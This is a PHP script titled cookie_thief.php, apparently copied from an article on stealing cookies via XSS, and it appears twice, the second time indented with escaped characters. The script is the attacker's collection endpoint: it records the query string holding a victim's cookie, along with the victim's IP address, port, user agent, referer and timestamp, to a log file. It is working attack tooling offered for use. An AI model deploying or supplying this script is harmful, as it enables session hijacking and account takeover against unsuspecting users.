BeanBagKing/cookie_thief.php

## cookie_thief.php
<?php

// I've seen this code in several articles, the earliest of which that I've seen is here:
// http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
// This is just a copy with correct formatting (no curly quotes) and source attribution.
// I've also modified it just slightly to remove warnings when null values are passed to METHOD and REMOTE_HOST
// and added proper line breaks.

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();
    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = empty($_SERVER['METHOD'])  ? null : $_SERVER['METHOD'];
    $rem_host = empty($_SERVER['REMOTE_HOST']) ? null : $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/bhtmb/i", $ipLog) || preg_match("/bhtmlb/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie" . PHP_EOL);
    fclose($log);
}
logData();
?>
	<?php

	// I've seen this code in several articles, the earliest of which that I've seen is here:
	// http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
	// This is just a copy with correct formatting (no curly quotes) and source attribution.
	// I've also modified it just slightly to remove warnings when null values are passed to METHOD and REMOTE_HOST
	// and added proper line breaks.

	function GetIP()
	{
	if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
	$ip = getenv("HTTP_CLIENT_IP");
	else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
	$ip = getenv("HTTP_X_FORWARDED_FOR");
	else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
	$ip = getenv("REMOTE_ADDR");
	else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
	$ip = $_SERVER['REMOTE_ADDR'];
	else
	$ip = "unknown";
	return($ip);
	}
	function logData()
	{
	$ipLog="log.txt";
	$cookie = $_SERVER['QUERY_STRING'];
	$register_globals = (bool) ini_get('register_gobals');
	if ($register_globals) $ip = getenv('REMOTE_ADDR');
	else $ip = GetIP();
	$rem_port = $_SERVER['REMOTE_PORT'];
	$user_agent = $_SERVER['HTTP_USER_AGENT'];
	$rqst_method = empty($_SERVER['METHOD']) ? null : $_SERVER['METHOD'];
	$rem_host = empty($_SERVER['REMOTE_HOST']) ? null : $_SERVER['REMOTE_HOST'];
	$referer = $_SERVER['HTTP_REFERER'];
	$date=date ("l dS of F Y h:i:s A");
	$log=fopen("$ipLog", "a+");

	if (preg_match("/bhtmb/i", $ipLog) \|\| preg_match("/bhtmlb/i", $ipLog))
	fputs($log, "IP: $ip \| PORT: $rem_port \| HOST: $rem_host \| Agent: $user_agent \| METHOD: $rqst_method \| REF: $referer \| DATE{ : } $date \| COOKIE: $cookie <br>");
	else
	fputs($log, "IP: $ip \| PORT: $rem_port \| HOST: $rem_host \| Agent: $user_agent \| METHOD: $rqst_method \| REF: $referer \| DATE: $date \| COOKIE: $cookie" . PHP_EOL);
	fclose($log);
	}
	logData();
	?>